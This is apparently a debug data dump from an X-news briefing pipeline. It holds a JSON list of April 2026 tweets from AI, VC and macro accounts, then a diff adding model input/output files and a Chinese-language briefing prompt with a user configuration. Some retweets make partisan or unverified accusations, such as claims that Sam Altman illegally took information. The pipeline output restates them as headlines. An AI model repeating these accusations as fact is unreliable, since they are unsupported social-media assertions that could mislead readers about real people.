movie star. You're far more likely simply to fail.", "url": "https://x.com/paulg/status/2048677984106664227"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T08:14:21+00:00", "title": "😳", "url": "https://x.com/pmarca/status/2048677114480873657"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T08:07:29+00:00", "title": "cc @BrendanEich", "url": "https://x.com/pmarca/status/2048675385119019444"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T08:04:13+00:00", "title": "👀", "url": "https://x.com/pmarca/status/2048674564314685477"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T08:01:44+00:00", "title": "But \"A Disservice To Those Who Are Watching\" is the name of this show!", "url": "https://x.com/pmarca/status/2048673940072251670"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T07:59:56+00:00", "title": "cc @elonmusk", "url": "https://x.com/pmarca/status/2048673488383447437"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T04:43:41+00:00", "title": "When one thing becomes abundant and cheap, another thing becomes scarce and valuable.", "url": "https://x.com/pmarca/status/2048624098398650608"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T04:32:43+00:00", "title": "Overheard in Silicon Valley: \"Imagine if he heard how the world really worked. Wonder what manifesto would say then.\"", "url": "https://x.com/pmarca/status/2048621340408844368"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T04:29:26+00:00", "title": "Image", "url": "https://x.com/pmarca/status/2048620511912194339"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T04:10:44+00:00", "title": "The apps can rewrite the files. 👀", "url": "https://x.com/pmarca/status/2048615807190769738"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-27T04:08:42+00:00", "title": "RT by @paulg: Whenever I go to Paris to talk about investing in YC startups, I'm always amazed how much the French just LOVE Y Combinator. Nous t'aimons aussi, France.\n\nMy French friend of @Fundoraclub wanted to see YC from the inside...and share it with the people of France. T", "url": "https://x.com/paulg/status/2048615296613937201"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T04:07:00+00:00", "title": "Many such cases.", "url": "https://x.com/pmarca/status/2048614869352714619"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T04:06:10+00:00", "title": "🇺🇸", "url": "https://x.com/pmarca/status/2048614659595583651"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T04:04:46+00:00", "title": "Many such cases (in the universe).", "url": "https://x.com/pmarca/status/2048614305705386433"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T03:56:11+00:00", "title": "Concerning.", "url": "https://x.com/pmarca/status/2048612144871264609"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T03:49:14+00:00", "title": "Self recommending!", "url": "https://x.com/pmarca/status/2048610397243265189"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T03:39:49+00:00", "title": "RT by @GaryMarcus: The greatest con of the decade was calling autocomplete “AI”. \n\nThe second greatest is calling autocomplete-in-a-loop an “agent”.", "url": "https://x.com/GaryMarcus/status/2048608025464705084"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T03:11:45+00:00", "title": "Grok Imagine", "url": "https://x.com/elonmusk/status/2048600964102246438"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T03:01:18+00:00", "title": "Self recommending recommending.", "url": "https://x.com/pmarca/status/2048598334492033455"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T02:57:11+00:00", "title": "👀", "url": "https://x.com/pmarca/status/2048597298150875169"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T02:41:14+00:00", "title": "“Always keep a separate backup.” For sure, every experienced programmer should know this.\n\n𝘉𝘶𝘵 𝘸𝘦 𝘫𝘶𝘴𝘵 𝘤𝘳𝘦𝘢𝘵𝘦𝘥 𝘢 𝘸𝘩𝘰𝘭𝘦 𝘨𝘦𝘯𝘦𝘳𝘢𝘵𝘪𝘰𝘯 𝘰𝘧 𝘷𝘪𝘣𝘦 𝘤𝘰𝘥𝘦𝘳𝘴 𝘸𝘩𝘰 𝘥𝘰𝘯’𝘵.\n\nAnd we now have a legion of synthetic coding agents (like Cursor) that also apparently don’t always follow this basic princ", "url": "https://x.com/GaryMarcus/status/2048593283639894520"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T02:34:50+00:00", "title": "👀", "url": "https://x.com/pmarca/status/2048591674688037210"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T02:26:57+00:00", "title": "Curiosity & adventure are my philosophy\n\nhttps://grok.com/share/bGVnYWN5_d70e0164-cced-4096-99cb-38604067aa7a", "url": "https://x.com/elonmusk/status/2048589691054694406"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T02:25:10+00:00", "title": "RT by @GaryMarcus: “fails less often than a human does” is a terrible metric. \n \nWe build deterministic software and test it to destruction to ensure it’s 99.99999 reliable . That’s been the basis of every critical application such as accounting payroll and logistics. \n\nLLMs can", "url": "https://x.com/GaryMarcus/status/2048589239915577837"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T02:25:08+00:00", "title": "Overheard in Silicon Valley: \"Did a Claw post this?\"", "url": "https://x.com/pmarca/status/2048589233095643240"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T01:59:04+00:00", "title": "RT by @GaryMarcus: the beauty of a jagged frontier\nis that every failure is the user's fault\nand every breakthrough is the model's glory", "url": "https://x.com/GaryMarcus/status/2048582672163995766"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-27T01:51:02+00:00", "title": "Incredible writing from @euphoriaHBO", "url": "https://x.com/jason/status/2048580651985604783"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T01:48:56+00:00", "title": "RT by @GaryMarcus: I mean AI influencers here and everywhere are screaming you shouldn't get hired if you don't use agentic AI because you're deliberatly slowing everyone down and the moment something goes wrong it's your fault because you didn't understand the tool?", "url": "https://x.com/GaryMarcus/status/2048580122521780676"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T01:44:47+00:00", "title": "RT by @GaryMarcus: The only AGI that Sam Altman is after is Adjusted Gross Income.", "url": "https://x.com/GaryMarcus/status/2048579079121555764"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T01:40:43+00:00", "title": "the difference is that we don’t *hype* giving 12 year-olds bulldozers.\n\n*of course* it’s a kind of user error when a model destroys all of user’s data and they didn’t have a backup. that’s the point.\n\nvibe coding without considerable experience is like driving without a license.", "url": "https://x.com/GaryMarcus/status/2048578055283880296"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T01:20:46+00:00", "title": "Overheard in Silicon Valley: \"Now, software is just the prompt for the next version of the software.\"", "url": "https://x.com/pmarca/status/2048573035616375134"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T01:09:02+00:00", "title": "RT by @GaryMarcus: Never ever use generative AI for anything critical. \n\nThe technology is probablistic all the way down and therefore inherently unreliable. \n\nWhy is this so hard to understand? \n\nIt’s wild how many seemingly smart people have drunk the cool aid on this.", "url": "https://x.com/GaryMarcus/status/2048570082843082905"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T01:00:07+00:00", "title": "Generative AI as the Hindenberg", "url": "https://x.com/GaryMarcus/status/2048567837221089669"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T00:25:00+00:00", "title": "Is it me or X starting to look like a vibe coded mess?\n\nPolls are broken.\n\nAccounts are getting hacked.\n\nMy DMs are full of phishing scams.\n\nBasics that used to work no longer work.", "url": "https://x.com/GaryMarcus/status/2048558998325166498"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-27T00:05:31+00:00", "title": "so fun to see the reception to 5.5!\n\nthere is almost nothing that feels more gratifying to me than builders saying they find our tools useful.", "url": "https://x.com/sama/status/2048554097985593849"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T00:02:43+00:00", "title": "R to @GaryMarcus: btw polling software is broken! votes aren’t showing, as many folks have noted. eg I see none:", "url": "https://x.com/GaryMarcus/status/2048553390540734479"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T00:00:53+00:00", "title": "Total AI disaster, totally predictable", "url": "https://x.com/GaryMarcus/status/2048552931923013916"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-26T23:59:53+00:00", "title": "Our Principles:\n\nDemocratization, Empowerment, Universal Prosperity, Resilience, and Adaptability\n\nhttps://openai.com/index/our-principles/", "url": "https://x.com/sama/status/2048552677433643427"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-26T23:22:48+00:00", "title": "Remember this", "url": "https://x.com/elonmusk/status/2048543344746250466"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-26T22:50:49+00:00", "title": "Grad school indoctrination camps", "url": "https://x.com/elonmusk/status/2048535299102265720"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-26T22:34:46+00:00", "title": "We hired someone for the investing team. \n\nSomething I never planned to do. \n\nThey sent the team 3 new deals per day for 90 days straight. \n\nAll aligned to our stage, geography and deal type. \n\nThat’s how you hustle and get a job in VC. \n\nStay tuned. Reveal to come.", "url": "https://x.com/HarryStebbings/status/2048531257399664920"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-26T21:32:43+00:00", "title": "Many such cases.", "url": "https://x.com/pmarca/status/2048515643268567431"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-26T21:21:33+00:00", "title": "RT by @elonmusk: 🚨BREAKING: I found Cole Allen's archived tweets.\n\nHe predicted \"Kamala wins all swing states,\" compared Trump's win to “Nazis getting elected,” and moved to Bluesky.\n\nThe scary part: he retweeted every mainstream Democrat on this platform.\n\nThread below. 👇\n\nWhat ", "url": "https://x.com/elonmusk/status/2048512831692452091"}, {"handle": "DavidSacks", "name": "David Sacks", "published_at": "2026-04-26T20:42:24+00:00", "title": "MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.", "url": "https://x.com/DavidSacks/status/2048502978626113625"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T19:42:30+00:00", "title": "I’ve invested in 700 private companies \n\nProviding liquidity and loans to high performing founders is completely standard. \n\nIn fact, investors encourage loans and secondary sales for founders to enable them to go for the Gold — which is exactly what SpaceX has done. \n\nThe @NYTim", "url": "https://x.com/jason/status/2048487905543237675"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-26T19:35:39+00:00", "title": "I have interviewed 1,000 of the best CEOs of the last 10 years. \n\nAdam Foroughi, Founder @AppLovin is easily top 3, ever. \n\n$160BN Market Cap \n\n$5.48BN Revenue\n\n$10M EBITDA per head \n\n82%+ margins\n\nJust 450 people in core business 🤯 \n\nNo other business on the planet has numbers l", "url": "https://x.com/HarryStebbings/status/2048486182904852537"}, {"handle": "ylecun", "name": "Yann LeCun", "published_at": "2026-04-26T18:31:11+00:00", "title": "RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs, lower unemployment, higher GDP in Democratic administrations than every GOP admi", "url": "https://x.com/ylecun/status/2048469956627468510"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T18:14:04+00:00", "title": "Ok @Acosta, balls in your court", "url": "https://x.com/jason/status/2048465651723882972"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T18:05:09+00:00", "title": "The NYTimes focus last week was micro-looting, social murder and meaningless private company transactions designed to ferment class warfare.\n\nDisgraziad", "url": "https://x.com/jason/status/2048463405590225173"}, {"handle": "DavidSacks", "name": "David Sacks", "published_at": "2026-04-26T17:37:26+00:00", "title": "RT by @DavidSacks: Accurate", "url": "https://x.com/DavidSacks/status/2048456433981591867"}, {"handle": "ylecun", "name": "Yann LeCun", "published_at": "2026-04-26T17:27:23+00:00", "title": "RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950.\n\nThe National Science Board is the independent body that oversees the National Science Foundation, the agency t", "url": "https://x.com/ylecun/status/2048453901930660058"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T17:13:01+00:00", "title": "Who made this?!", "url": "https://x.com/jason/status/2048450286902235560"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T16:21:34+00:00", "title": "I’m proud to announce I’m hosting an exhibition cage match between @Acosta and @mtracey on July 4th \n\n$100,000 cash prize \n\nVegas \n\n3, 3 minute rounds", "url": "https://x.com/jason/status/2048437340218044499"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-26T16:18:48+00:00", "title": "RT by @charliebilello: Does a government shutdown negatively impact the stock market?\n\nNo.\n\nThe S&P 500 has gained an average of 0.4% during prior shutdowns and is up 4.8% during the current shutdown which is the longest in history at 70 days and counting.\n\n$SPX", "url": "https://x.com/charliebilello/status/2048436641451155650"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T16:16:34+00:00", "title": "Once again, the substack party result in a Donnybrook — it’s like the source awards for wordmaxxers", "url": "https://x.com/jason/status/2048436081725464959"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-26T16:14:38+00:00", "title": "RT by @elonmusk: 25% of very liberal people say political violence can “sometimes be justified.”\n\nAmong very conservative people it’s just 3%.\n\nIn other words, the far left is 8x more likely to support political violence as the far right.\n\nStop pretending this is a “both sides” p", "url": "https://x.com/elonmusk/status/2048435593244237849"}, {"handle": "ylecun", "name": "Yann LeCun", "published_at": "2026-04-26T16:03:04+00:00", "title": "RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. \n\nPoliticians never waste a good fake crisis, which is why they're perfect for Bernie to try to seize the means of production back from the private sphere.\n\n", "url": "https://x.com/ylecun/status/2048432684930654430"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-26T15:46:41+00:00", "title": "feels like a good time to seriously rethink how operating systems and user interfaces are designed\n\n(also the internet; there should be a protocol that is equally usable by people and agents)", "url": "https://x.com/sama/status/2048428561481265539"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-26T15:37:00+00:00", "title": "\"post-AGI, no one is going to work and the economy is going to collapse\"\n\n\"i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stretches and miss out on working\"", "url": "https://x.com/sama/status/2048426122854228141"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-26T15:10:21+00:00", "title": "RT by @charliebilello: The 12.5% gain in the S&P 500 over the last 4 weeks was the 20th biggest 4-week advance for the index since 1950. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s", "url": "https://x.com/charliebilello/status/2048419415222259820"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-26T15:07:55+00:00", "title": "Seeing two types of founders emerge in this moment:\n\nThe tourists and the terminators. \n\nThe terminators are salivating at the opportunity ahead. Hungrier than ever. More ambitious than ever. They want it more than ever. \n\nThe tourists. They want to sell. They are scared. They do", "url": "https://x.com/HarryStebbings/status/2048418806867870115"}, {"handle": "DavidSacks", "name": "David Sacks", "published_at": "2026-04-26T15:03:35+00:00", "title": "RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by the handle http://ColdForce.bsky.social with multiple references violence and guns", "url": "https://x.com/DavidSacks/status/2048417712439689346"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-26T14:48:06+00:00", "title": "RT by @paulg: Yeah okay, Lego bros, brodettes and brotheys are cooked with this one.\n\nGPT 2 Image can create full Lego sets! With actual Bricklink IDs so you can order the parts and build it.\n\nWhole new business opportunity here for the taking.", "url": "https://x.com/paulg/status/2048413815675539816"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-26T14:47:09+00:00", "title": "Every post, I block and report a couple accounts using AI-generated replies. It feels much the same as picking up litter on a city street; I don't know if it has any effect, but it feels like I ought to at least try to keep the site clean.", "url": "https://x.com/paulg/status/2048413578789634100"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-26T14:40:28+00:00", "title": "Durer was the original Dr Seuss.", "url": "https://x.com/paulg/status/2048411898081583547"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-26T14:36:59+00:00", "title": "Writing a talk to give in Stockholm. The prospect of speaking to a large group of people is no longer frightening, but writing a talk is as much work as ever. I'm no longer afraid of audiences, but I'm still just as afraid of making mistakes.", "url": "https://x.com/paulg/status/2048411021329453562"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-26T14:19:13+00:00", "title": "RT by @charliebilello: The stock market is at an all-time high.\n\nCredit spreads are near all-time lows.\n\nAnd inflation has been above the Fed's target level for 61 consecutive months, averaging 4% per year since 2019.\n\nSo why is the Fed expanding its balance sheet (QE)?\n\nVideo: h", "url": "https://x.com/charliebilello/status/2048406550897729561"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-26T14:00:02+00:00", "title": "RT by @charliebilello: On March 30, the S&P 500 was down 7% in 2026, the 12th worst start to a year in history. After one of the biggest 4-week rallies ever, it's now up +5% YTD and above the average year at this point in time (+3%). There is no impossible in markets.\n\nVideo: htt", "url": "https://x.com/charliebilello/status/2048401720540061794"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-26T13:56:31+00:00", "title": "The best founders I know all text their investors. \n\nNone of them email them. \n\nThe relationship will blossom and deepen in a matter of messages.", "url": "https://x.com/HarryStebbings/status/2048400836024283246"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T13:51:54+00:00", "title": "RT by @Jason: Random pic of @Jason protecting our $TAO bags", "url": "https://x.com/jason/status/2048399674269213067"}, {"handle": "ylecun", "name": "Yann LeCun", "published_at": "2026-04-26T13:51:41+00:00", "title": "Shooting oneself in the foot?\nNope.\nShooting oneself in the prefrontal cortex.", "url": "https://x.com/ylecun/status/2048399621492236615"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-26T13:45:00+00:00", "title": "RT by @charliebilello: Global Inflation Rates are on the RISE...\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=1433s", "url": "https://x.com/charliebilello/status/2048397937156518387"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-26T13:37:21+00:00", "title": "RT by @paulg: 'Action is now needed': Over 60 ex-U.K. ambassadors call to sanction Israel over West Bank\nhttps://www.haaretz.com/west-bank/2026-04-26/ty-article/.premium/over-60-ex-uk-ambassadors-call-to-sanction-israel-over-west-bank/0000019d-c950-d11b-a7df-ef5a5fba0000", "url": "https://x.com/paulg/status/2048396013816152216"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-26T13:30:00+00:00", "title": "RT by @charliebilello: With the exception of Bitcoin, every major asset class is now in positive territory on the year...\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=973s", "url": "https://x.com/charliebilello/status/2048394162366533935"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-26T13:14:49+00:00", "title": "RT by @charliebilello: The S&P 500 ended the week at another all-time high, its 9th of the year. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s", "url": "https://x.com/charliebilello/status/2048390341221404827"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-26T11:57:10+00:00", "title": "Good use of camouflage by Biscuit.", "url": "https://x.com/paulg/status/2048370801833828507"}, {"handle": "JeffDean", "name": "Jeff Dean", "published_at": "2026-04-26T10:41:25+00:00", "title": "RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯\n\nSabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!!\n\nHe makes history as the first man to officially break 2 hours in the marathon.\n\nYomif Kejelcha 🇪🇹 in h", "url": "https://x.com/JeffDean/status/2048351736037826877"}, {"handle": "ylecun", "name": "Yann LeCun", "published_at": "2026-04-26T06:48:29+00:00", "title": "RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories.\n\nIf you're on either side of this slider, congratulations, you may be a child in an adult costume body!\n\nBlack and white thinking is for children. \n\nWhen you become an adult it's time to put a", "url": "https://x.com/ylecun/status/2048293118781296734"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T03:57:07+00:00", "title": "The left has a serious violence problem, which @DavidSacks called out early and often. \n\nThis generation of woke democratic socialists are morally bankrupt. \n\nThey believe in looting and violence as a political tool — and they’re vocal about it. \n\nIf you called out the violent me", "url": "https://x.com/jason/status/2048249992163242220"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-26T03:46:17+00:00", "title": "If you’re not condemning these lunatics, you’re advocating for the end of the American empire. \n\nI’m not for canceling people, but the fact the @nytimes and @newyorker not only employees these individuals, but selects them to represent their brands, shows exactly how bankrupt the", "url": "https://x.com/jason/status/2048247267182658004"}] diff --git a/data/x_brief/debug/20260428_010131_l2_input.json b/data/x_brief/debug/20260428_010131_l2_input.json new file mode 100644 index 0000000..547c789 --- /dev/null +++ b/data/x_brief/debug/20260428_010131_l2_input.json @@ -0,0 +1,28 @@ +{ + "target_indexes": [ + 0, + 1, + 2 + ], + "target_count": 3, + "targets": [ + { + "idx": 0, + "handle": "elonmusk", + "url": "https://x.com/elonmusk/status/2048807976991850953", + "title": "Calling him “Scam” Altman is accurate. \n\nThis is very much worth reading." + }, + { + "idx": 1, + "handle": "elonmusk", + "url": "https://x.com/elonmusk/status/2048804363595059425", + "title": "RT by @elonmusk: Sam Altman cannot be trusted.\n\n• The OpenAI board fired him because he was not always honest with them. They said he should not control powerful AI.\n\n• A major report talked to over 100 people and saw secret papers. It says he has almost a sociopathic lack of concern for the truth. People who worked with him say he lies easily but still wants everyone to like him.\n\n• Top scientist Ilya made 70 pages of notes before the firing. They showed Sam was not honest with the team and board about safety rules.\n\n• He changed OpenAI from a nonprofit that Elon helped start to a for profit money making business. It was meant to be open for everyone with no personal gain.\n\n• He trained OpenAI on Twitter data without permission.\n\n• He keeps lying and shows a lack of transparency.\n\n• He poached xAI staff and took sensitive info illegally.\n\n• He dropped core safety promises to race for growth and money. Old team members say his big expensive AI projects around the world are too dangerous.\n\n• An ex OpenAI board member flat out called him a liar.\n\nThis is not just talk. It is what the people closest to him said and what the facts show. When the folks who worked with him say he cannot be trusted." + }, + { + "idx": 2, + "handle": "elonmusk", + "url": "https://x.com/elonmusk/status/2048802239272169582", + "title": "Exactly" + } + ] +} \ No newline at end of file diff --git a/data/x_brief/debug/20260428_010131_l2_output.json b/data/x_brief/debug/20260428_010131_l2_output.json new file mode 100644 index 0000000..0e935ea --- /dev/null +++ b/data/x_brief/debug/20260428_010131_l2_output.json @@ -0,0 +1,12 @@ +{ + "target_indexes": [ + 0, + 1, + 2 + ], + "broadcast_zh": [ + "‘骗子’Sam Altman这一称呼是否恰当?", + "重大报告揭露Sam Altman信任危机", + "‘准确’背后的科技圈伦理争议升级" + ] +} \ No newline at end of file diff --git a/data/x_brief/debug/20260428_010738_l1_input.txt b/data/x_brief/debug/20260428_010738_l1_input.txt new file mode 100644 index 0000000..35457f2 --- /dev/null +++ b/data/x_brief/debug/20260428_010738_l1_input.txt @@ -0,0 +1,413 @@ +[meta] + +tweets=120 + +tweet_summary_chars=61510 + + + +[prompt] + +你是“X资讯月报总编”。请将原始推文样本压缩为前端仪表盘可直接渲染的模块化 JSON。 + +你必须遵循“用户配置文档”的偏好: +- 优先覆盖“我现在最关心的事”; +- 按“账号权重与偏好”做信息优先级排序(高权重账号更容易进入 themes/p0); +- 按“内容类型偏好(✅/❌)”进行取舍; +- 尽量贴合“简报格式偏好”的表达风格(中文总结为主,保留关键英文原句); +- 页面是固定模块位,内容应服务于前端模块整合,不要输出散乱信息。 + +硬性要求: +1) 只输出 JSON 对象,不要 markdown。 +2) 使用如下字段: +{ + "themes":[{"id":"t1","title":"...","subtitle":"...","bullets":["..."],"samples":[{"text":"...","url":"...","handle":"...","date":"..."}]}], + "p0_events":[{"id":"p01","title":"...","meta":"...","summary":"...","url":"..."}], + "top_quotes":[{"id":"q1","quote":"...","speaker":"...","date":"...","note":"...","url":"..."}], + "category_updates":[{"id":"c1","title":"...","subtitle":"...","level":"P0|P1|P2|WARN","items":[{"text":"...","url":"..."}]}], + "risk_signals":[{"id":"r1","level":"HIGH|MID|OPP","title":"...","detail":"..."}] +} +3) 数量限制:themes=3, p0_events<=6, top_quotes<=3, category_updates<=6, risk_signals<=6。 +4) 优先引用有明确链接的证据;无法确定时宁缺毋滥。 +5) 内容必须中文,简洁可执行。 + +用户配置文档(用于本次简报编排): +# 我的 X 资讯简报配置 +> 这是一份活的文档。你可以随时手动编辑,Claude 也会根据你的阅读行为自动更新行为日志和权重建议。 +> 设计参考:Karpathy 的 LLM Wiki 模式——知识预编译,随时间积累。 + +**创建日期**:2026-04-26 +**最后更新**:2026-04-28(账号列表经核查优化:修正7处、新增5个、删除7个) + +--- + +## 一、我现在最关心的事 +> 这是简报的核心过滤器。Claude 在筛选和总结推文时,会优先选出和这里相关的内容放进主题卡片。 + +- 探索 AI 工具在投资研究和期权分析中的实际应用 +- 寻找值得在 B站分享的开源项目和 AI 工具(能快速跑通、有演示效果的优先) +- 跟上 AI 编程工具的发展(Claude Code、Cursor、Agent 相关) +- 了解顶级 VC 和行业领袖对 AI 下一步方向的判断 +- 关注 A股和美股宏观叙事的变化(尤其是科技板块) + +--- + +## 二、账号权重与偏好 + +> 权重分三档:高 / 中 / 低 +> 高权重账号:内容优先进入主题卡片 +> 中权重账号:有足够价值时进入快速扫读 +> 低权重账号:仅在有明确高价值内容时出现 + +### AI 行业 + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @karpathy | Andrej Karpathy | 高 | 技术深度、可操作项目、AI编程实践 | 质量极高,几乎每条都值得看 | +| @sama | Sam Altman | 高 | 行业方向、产品发布 | 信息密度高,观点有参考价值 | +| @DarioAmodei | Dario Amodei | 高 | Anthropic动向、AI安全与能力 | Anthropic CEO,和Claude直接相关,新增 | +| @AravSrinivas | Aravind Srinivas | 高 | AI产品方向、搜索与Agent | Perplexity CEO,活跃度高,新增 | +| @AndrewYNg | Andrew Ng | 高 | 学习资源、AI教育、应用落地 | 对理解AI应用场景有帮助 | +| @ylecun | Yann LeCun | 中 | 研究方向、学术争论 | 偶尔有深度洞见,但争论性内容较多 | +| @JeffDean | Jeff Dean | 中 | 研究进展、Google AI动向 | 更新频率低,但含金量高 | +| @soumithchintala | Soumith Chintala | 中 | 开源框架、技术工具 | PyTorch相关,关注技术底层 | +| @gregbrockman | Greg Brockman | 中 | OpenAI产品动向 | 更新较少,有则关注 | +| @GaryMarcus | Gary Marcus | 低 | AI批评与反思 | 有参考价值但以质疑为主,权重偏低 | +| @elonmusk | Elon Musk | 低 | 偶尔有AI/科技相关 | 噪音多,仅关注有实质内容的推文 | + +### VC / 投资人 + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @paulg | Paul Graham | 高 | 创业思维、长文洞见 | 更新少但质量极高,每条都值得读 | +| @naval | Naval Ravikant | 高 | 思维框架、财富哲学 | 更新不频繁,但思想密度高 | +| @pmarca | Marc Andreessen | 高 | AI/科技政策、VC判断、行业叙事 | a16z联合创始人,极其活跃,2.1M粉,新增替换@lmsqueegie | +| @david_tiantian | David Tian Wang | 中 | 宏观分析、市场判断 | 原@david__tian(handle有误,已修正);账号实际发帖量约42条,活跃度一般 | +| @morganhousel | Morgan Housel | 中 | 投资心理、长期主义、行为金融 | 《Psychology of Money》作者,思想密度高,新增 | +| @eladgil | Elad Gil | 中 | AI投资趋势、公司判断 | 偶有高质量行业洞见 | +| @DavidSacks | David Sacks | 中 | 科技政策、VC视角 | 观点有时偏政治,筛选后看 | +| @HarryStebbings | Harry Stebbings | 低 | VC动态 | 内容较泛,权重低 | +| @jason | Jason Calacanis | 低 | 创业生态 | 噪音较多 | + +### 宏观与交易 + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @charliebilello | Charlie Bilello | 高 | 宏观数据图表、资产类别轮动 | 每天发图表分析,数据驱动,新增;贴近A股/美股宏观叙事主线 | +| @WarriorTrading | Warrior Trading | 低 | 日内交易技术 | 偏教育/营销内容,仅保留;TradingGods/ProfTrading已移除(账号无法验证) | +| @CryptoCred | Credible Crypto | 低 | 加密趋势分析 | 加密相关,权重偏低 | +| @AltcoinBuzz | AltcoinBuzz | 低 | 币圈媒体 | 偏媒体性质,优先级低 | + +### 华语圈 + +> ⚠️ 注意:中文账号名的 X handle 无法被 Nitter RSS 正常抓取。以下账号需通过 X API 或手动采集。 + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @二级炒家 | 二级炒家 | 高 | A股宏观、市场判断 | 和投资主线直接相关;⚠️ 中文handle,需X API | +| @svwang1 | 